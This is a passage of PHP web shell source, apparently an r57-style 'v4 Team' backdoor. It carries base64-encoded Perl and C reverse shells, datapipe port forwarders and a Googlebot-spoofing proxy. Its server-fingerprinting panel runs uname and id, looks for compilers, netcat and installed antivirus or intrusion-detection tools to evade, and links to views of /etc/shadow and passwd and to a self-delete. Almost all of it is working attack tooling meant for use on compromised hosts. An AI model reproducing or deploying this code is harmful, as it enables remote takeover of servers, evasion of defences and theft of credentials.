sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";

$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";

$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";

if($unix)
 {
 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
 if($safe_mode) { $sysctl = '-'; }
 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
 else
  {
   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
   if(empty($sysctl)) { $sysctl = '-'; }
   setcookie('sysctl',$sysctl);
  }
 }
echo $head;
echo '</head>';

echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>v4</b></font><b>'.ws(2).'Team '.$version.'</b></font></td><td bgcolor=#0C0C0C><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=067AFC>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [<font color=red>".$_SERVER['X_FORWARDED_FOR']."</font>]";}
if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [<font color=red>".$_SERVER['CLIENT_IP']."</font>]";}
echo " Server IP: [<font color=067AFC>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";

echo "<br>";

echo ws(2)."PHP version: <font color=067AFC><b>".@phpversion()."</b></font>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: <b>".(($curl_on)?("<font color=2BD53F>ON</font>"):("<font color=red>OFF</font>"));
echo "</b>".ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=2BD53F>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
echo "</b>".ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=2BD53F>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>".ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=2BD53F>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>".ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=2BD53F>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b><br>".ws(2);

echo "Safe_mode: <b>";
echo (($safe_mode)?("<font color=2BD53F>ON</font>"):("<font color=red>OFF</font>"));
echo "</b>".ws(2);
echo "Open_basedir: <b>";
if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=2BD53F>$df</font></b>";};}
else {echo "<font color=red>NONE</font></b>";}
echo ws(2)."Safe_mode_exec_dir: <b>";
if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=2BD53F>$df</font></b>";};}
else {echo "<font color=red>ini_get disable!</font></b>";}
echo ws(2)."Safe_mode_include_dir: <b>";
if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=2BD53F>$df</font></b>";};}
else {echo "<font color=red>ini_get disable!</font></b>";}
echo "<br>".ws(2);
echo "Disabled functions : <b>";$df='ini_get  disable!';
if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=red>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}

$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";

$ust='';
if($unix && !$safe_mode){
if (which('gcc')) {$ust.="gcc,";}
if (which('cc')) {$ust.="cc,";}
if (which('nano')) {$ust.="nano,";}
if (which('pico')) {$ust.="pico,";}
if (which('ld')) {$ust.="ld,";}
if (which('php')) {$ust.="php,";}
if (which('perl')) {$ust.="perl,";}
if (which('python')) {$ust.="python,";}
if (which('ruby')) {$ust.="ruby,";}
if (which('make')) {$ust.="make,";}
if (which('tar')) {$ust.="tar,";}
if (which('nc')) {$ust.="netcat,";}
if (which('locate')) {$ust.="locate,";}
if (which('suidperl')) {$ust.="suidperl,";}
}
if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";}
#if (which('')) {$ust.=",";}
if($ust){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=067AFC>".$ust."</font>";}

$ust='';
if($unix && !$safe_mode){
if (which('kav')) {$ust.="kav,";}
if (which('nod32')) {$ust.="nod32,";}
if (which('bdcored')) {$ust.="bitdefender,";}
if (which('uvscan')) {$ust.="mcafee,";}
if (which('sav')) {$ust.="symantec,";}
if (which('lynx')) {$ust.="lynx,";}
if (which('drwebd')) {$ust="drwebd,";}
if (which('clamd')) {$ust.="clamd,";}
if (which('rkhunter')) {$ust.="rkhunter,";}
if (which('chkrootkit')) {$ust.="chkrootkit,";}
if (which('iptables')) {$ust.="iptables,";}
if (which('ipfw')) {$ust.="ipfw,";}
if (which('tripwire')) {$ust.="tripwire,";}
if (which('shieldcc')) {$ust.="stackshield,";}
if (which('portsentry')) {$ust.="portsentry,";}
if (which('snort')) {$ust.="snort,";}
if (which('ossec')) {$ust.="ossec,";}
if (which('lidsadm')) {$ust.="lidsadm,";}
if (which('tcplodg')) {$ust.="tcplodg,";}
if (which('tripwire')) {$ust.="tripwire,";}
if (which('sxid')) {$ust.="sxid,";}
if (which('logcheck')) {$ust.="logcheck,";}
if (which('logwatch')) {$ust.="logwatch,";}
}
if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";}
if($ust){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>$ust</font>";}


echo "<br>".ws(2)."</b>";
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>phpini</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
if(!$unix) {
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?systeminfo title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
}else{
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?syslog title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?resolv title=\"View resolv\"><b>resolv</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?hosts title=\"View hosts\"><b>hosts</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?shadow title=\"View shadow\"><b>shadow</b></a> ".$rb;

 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?passwd title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
}
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;

if($unix && !$safe_mode)
{
 echo "<br>".ws(2)."</b>";
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?procinfo title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?version title=\"View proc version\"><b>version</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?free title=\"View mem free\"><b>free</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?vmstat title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lspci title=\"View lspci\"><b>lspci</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsdev title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?sbin title=\"View running programs\"><b>sbin</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?interrupts title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise1 title=\"View realise1\"><b>realise1</b></a> ".$rb;
